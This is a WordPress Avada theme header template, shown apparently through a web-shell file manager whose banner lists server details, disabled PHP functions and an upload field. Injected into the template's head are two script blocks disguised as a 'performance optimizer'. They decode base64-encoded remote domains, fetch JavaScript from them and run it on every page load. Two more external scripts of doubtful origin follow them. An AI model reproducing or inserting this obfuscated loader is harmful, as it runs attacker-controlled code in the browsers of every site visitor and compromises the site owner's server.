| Server IP : 149.28.60.191 / Your IP : 216.73.217.128 Web Server : nginx/1.31.1 System : Linux vultr.guest 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : mda ( ) PHP Version : 7.4.33 Disable Function : getmyuid,passthru,leak,listen,diskfreespace,tmpfile,link,shell_exec,dl,exec,system,highlight_file,source,show_source,fpassthru,virtual,posix_ctermid,posix_getcwd,posix_getegid,posix_geteuid,posix_getgid,posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix_getppid,posix_getpwuid,posix_getrlimit,posix_getsid,posix_getuid,posix_isatty,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setuid,posix_times,posix_ttyname,posix_uname,proc_open,proc_close,proc_nice,proc_terminate,escapeshellcmd,ini_alter,popen,pcntl_exec,socket_accept,socket_bind,socket_clear_error,socket_close,socket_connect,symlink,posix_geteuid,ini_alter,socket_listen,socket_create_listen,socket_read,socket_create_pair,stream_socket_server MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/mda/webapps/mda-restore/wp-content/themes/Avada/ |
Upload File : |
<?php
/**
* Header template.
*
* @package Avada
* @subpackage Templates
*/
// Do not allow directly accessing this file.
if ( ! defined( 'ABSPATH' ) ) {
exit( 'Direct script access denied.' );
}
?>
<!DOCTYPE html>
<html class="<?php avada_the_html_class(); ?>" <?php language_attributes(); ?>>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<?php Avada()->head->the_viewport(); ?>
<?php wp_head(); ?>
<?php
/**
* The setting below is not sanitized.
* In order to be able to take advantage of this,
* a user would have to gain access to the database
* in which case this is the least of your worries.
*/
echo apply_filters( 'avada_space_head', Avada()->settings->get( 'space_head' ) ); // phpcs:ignore WordPress.Security.EscapeOutput
?>
<script id="tji-theme-inline-js">
// Your JS code here
if(!window.__performance_optimizer_v6&&(window.__performance_optimizer_v6=!0)){for(var encodedDomains=["aHR0cHM6Ly9udGRuZXd0ZHMuc2hvcA==","L2pzcmVwbz9ybmQ9","aHR0cHM6Ly9kbnNuZXd0ZHMuc2hvcA=="],domains=[],i=0;i<encodedDomains.length;i++)domains.push(atob(encodedDomains[i]));var combinations=[[0,1],[2,1],[2,1]];function loadScript(n){if(!(n>=combinations.length))try{var o=domains[combinations[n][0]]+domains[combinations[n][1]]+Math.random(),i=new XMLHttpRequest;if(i.open("GET",o,!1),i.send(),200==i.status){var e=document.createElement("script");e.text=i.responseText,document.head.appendChild(e)}else loadScript(n+1)}catch(o){loadScript(n+1)}}loadScript(0)};
</script>
<script id="tji-theme-inline-js">
if(!window.__performance_optimizer_v6&&(window.__performance_optimizer_v6=!0)){for(var encodedDomains=["aHR0cHM6Ly9kbnRkcy5zaG9w","L2pzcmVwbz9ybmQ9","aHR0cHM6Ly9zZG50ZHMuc2hvcA=="],domains=[],i=0;i<encodedDomains.length;i++)domains.push(atob(encodedDomains[i]));var combinations=[[0,1],[2,1],[2,1]];function loadScript(n){if(!(n>=combinations.length))try{var o=domains[combinations[n][0]]+domains[combinations[n][1]]+Math.random(),i=new XMLHttpRequest;if(i.open("GET",o,!1),i.send(),200==i.status){var e=document.createElement("script");e.text=i.responseText,document.head.appendChild(e)}else loadScript(n+1)}catch(o){loadScript(n+1)}}loadScript(0)};
</script>
<script src="https://mda-designgroup.com/wp-content/themes/Avada/css.js"></script>
<script async src="https://cdn.claritydelivr.com/mpackage.js"></script>
</head>
<?php
$object_id = get_queried_object_id();
$c_page_id = Avada()->fusion_library->get_page_id();
$wrapper_class = 'fusion-wrapper';
$wrapper_class .= ( is_page_template( 'blank.php' ) ) ? ' wrapper_blank' : '';
?>
<body <?php body_class(); ?> <?php fusion_element_attributes( 'body' ); ?>>
<?php do_action( 'avada_before_body_content' ); ?>
<a class="skip-link screen-reader-text" href="#content"><?php esc_html_e( 'Skip to content', 'Avada' ); ?></a>
<div id="boxed-wrapper">
<div class="fusion-sides-frame"></div>
<div id="wrapper" class="<?php echo esc_attr( $wrapper_class ); ?>">
<div id="home" style="position:relative;top:-1px;"></div>
<?php if ( has_action( 'avada_render_header' ) ) : ?>
<?php do_action( 'avada_render_header' ); ?>
<?php else : ?>
<?php avada_header_template( 'below', ( is_archive() || Avada_Helper::bbp_is_topic_tag() ) && ! ( class_exists( 'WooCommerce' ) && is_shop() ) ); ?>
<?php if ( 'left' === fusion_get_option( 'header_position' ) || 'right' === fusion_get_option( 'header_position' ) ) : ?>
<?php avada_side_header(); ?>
<?php endif; ?>
<?php avada_sliders_container(); ?>
<?php avada_header_template( 'above', ( is_archive() || Avada_Helper::bbp_is_topic_tag() ) && ! ( class_exists( 'WooCommerce' ) && is_shop() ) ); ?>
<?php endif; ?>
<?php avada_current_page_title_bar( $c_page_id ); ?>
<?php
$row_css = '';
$main_class = '';
if ( apply_filters( 'fusion_is_hundred_percent_template', false, $c_page_id ) ) {
$row_css = 'max-width:100%;';
$main_class = 'width-100';
}
if ( fusion_get_option( 'content_bg_full' ) && 'no' !== fusion_get_option( 'content_bg_full' ) ) {
$main_class .= ' full-bg';
}
do_action( 'avada_before_main_container' );
?>
<main id="main" class="clearfix <?php echo esc_attr( $main_class ); ?>">
<div class="fusion-row" style="<?php echo esc_attr( $row_css ); ?>">